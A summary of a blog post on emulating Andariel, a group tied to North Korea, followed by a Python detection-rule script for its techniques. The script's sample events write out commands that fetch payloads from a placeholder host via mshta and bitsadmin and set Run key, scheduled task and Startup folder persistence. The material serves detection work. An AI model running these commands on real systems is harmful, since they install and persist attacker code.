Emulating the Politically Motivated North Korean Adversary Andariel
2022-12-22 • Attack IQ
Andariel is presented as a North Korean RGB-linked Lazarus subgroup with a history of espionage against South Korean government and military targets and, later, financially motivated ransomware activity.

The emulated 2021 South Korea campaign chains a malicious Access file, Mshta-delivered payloads, Simple Agent HTTP C2, Startup folder persistence, local file staging, Akdoor execution via Rundll32, discovery commands, and Maui-style file encryption.

A separate Maui ransomware emulation reflects activity against healthcare and public health victims and other targets where DTrack, BITS jobs, process and network discovery, bookmark enumeration, C2 exfiltration, and ransomware deployment were observed.

The Operation ByteTiger section adds TigerDownloader and TigerRAT behavior, including MSHTA delivery, system and peripheral discovery, masquerading, scheduled task or Run key persistence, user discovery, and registry queries.

The value of the material is defensive validation: it maps Andariel tradecraft into attack graphs that can test prevention and detection controls against DPRK-linked espionage, disruption, and ransomware techniques.
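As an added example (not AttackIQ's code or part of the original post), the sketch below shows how a defender might encode the behaviours named above as detection rules over process-creation telemetry: MSHTA given a remote or inline script, Rundll32 loading a DLL from a user-writable path, a BITS transfer, a Run key write, a scheduled task creation, a copy into the Startup folder, and a burst of discovery commands from one parent. The event shape (Sysmon-like fields), the rule thresholds, and the sample events are all constructed assumptions for illustration; the rules go slightly beyond the summary by aggregating discovery commands per parent process rather than flagging each one.

```python
"""Added example: detection rules for the Andariel behaviours listed in the summary.
Events are constructed, Sysmon-like process-creation records; rule logic and
thresholds are the author's assumptions, not a copy of any vendor or AttackIQ rule."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the executing binary
    command_line: str
    parent_image: str   # full path of the parent process
    user: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Locations a standard user can write to; a DLL or executable staged here is suspicious.
USER_WRITABLE = re.compile(r"(?i)\\(users\\[^\\]+\\(appdata|downloads|desktop)|programdata|windows\\temp|temp)\\")
STARTUP = re.compile(r"(?i)\\microsoft\\windows\\start menu\\programs\\startup\\")
RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run")
DISCOVERY_BINARIES = {"whoami.exe", "ipconfig.exe", "netstat.exe", "tasklist.exe",
                      "systeminfo.exe", "net.exe", "net1.exe", "nltest.exe", "hostname.exe"}


def rule_mshta_remote(ev: ProcessEvent) -> bool:
    # MSHTA delivery: mshta.exe handed a URL or an inline script instead of a local .hta file
    return _basename(ev.image) == "mshta.exe" and bool(
        re.search(r"(?i)https?://|javascript:|vbscript:", ev.command_line))


def rule_rundll32_userpath(ev: ProcessEvent) -> bool:
    # Akdoor-style execution: rundll32 loading a DLL staged in a user-writable location
    return _basename(ev.image) == "rundll32.exe" and bool(USER_WRITABLE.search(ev.command_line))


def rule_bits_transfer(ev: ProcessEvent) -> bool:
    # BITS job used to fetch a payload
    return _basename(ev.image) == "bitsadmin.exe" and bool(
        re.search(r"(?i)/transfer|/addfile|/create", ev.command_line))


def rule_run_key(ev: ProcessEvent) -> bool:
    # Run key persistence written with reg.exe
    return (_basename(ev.image) == "reg.exe"
            and bool(re.search(r"(?i)\badd\b", ev.command_line))
            and bool(RUN_KEY.search(ev.command_line)))


def rule_schtasks_create(ev: ProcessEvent) -> bool:
    # Scheduled task persistence
    return _basename(ev.image) == "schtasks.exe" and bool(re.search(r"(?i)/create", ev.command_line))


def rule_startup_folder(ev: ProcessEvent) -> bool:
    # Startup folder persistence: a shell copying something into the Startup folder
    return (_basename(ev.image) in {"cmd.exe", "powershell.exe", "xcopy.exe"}
            and bool(STARTUP.search(ev.command_line)))


RULES = {
    "mshta_remote": rule_mshta_remote,
    "rundll32_userpath": rule_rundll32_userpath,
    "bits_transfer": rule_bits_transfer,
    "run_key": rule_run_key,
    "schtasks_create": rule_schtasks_create,
    "startup_folder": rule_startup_folder,
}


def run_rules(events):
    """Return {rule_name: [event indices that matched]} for every rule."""
    hits = {name: [] for name in RULES}
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(i)
    return hits


def discovery_bursts(events, threshold: int = 3):
    """Flag (parent_image, user) pairs that spawned at least `threshold` discovery commands.
    A single `whoami` is noise; several in a row from one parent is the pattern worth reviewing."""
    counts = {}
    for ev in events:
        if _basename(ev.image) in DISCOVERY_BINARIES:
            key = (ev.parent_image, ev.user)
            counts[key] = counts.get(key, 0) + 1
    return [(p, u, n) for (p, u), n in counts.items() if n >= threshold]


# Constructed sample telemetry (hostnames and paths are placeholders, not real IoCs).
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/a.hta", r"C:\Program Files\Microsoft Office\MSACCESS.EXE", r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\alice\AppData\Local\Temp\svc.dll,Start", CMD, r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /transfer job /download http://example.invalid/x C:\ProgramData\x.exe", CMD, r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\reg.exe", r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\ProgramData\x.exe", CMD, r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe", r"schtasks /create /sc onlogon /tn Updater /tr C:\ProgramData\x.exe", CMD, r"CORP\alice"),
    ProcessEvent(CMD, r'cmd.exe /c copy C:\ProgramData\x.exe "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.exe"', r"C:\Windows\explorer.exe", r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\whoami.exe", "whoami", CMD, r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\ipconfig.exe", "ipconfig /all", CMD, r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\netstat.exe", "netstat -ano", CMD, r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\tasklist.exe", "tasklist", CMD, r"CORP\alice"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe", r"CORP\alice"),   # benign
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe", r"CORP\alice"),  # benign
]

if __name__ == "__main__":
    for name, idx in run_rules(SAMPLE_EVENTS).items():
        print(f"{name}: {idx}")
    print("discovery bursts:", discovery_bursts(SAMPLE_EVENTS))
```

The per-rule output identifies which sample events tripped which behaviour, and the last line reports the one parent process that ran four discovery commands; the two benign events match nothing, which is the property to preserve when tuning the path patterns for a real environment.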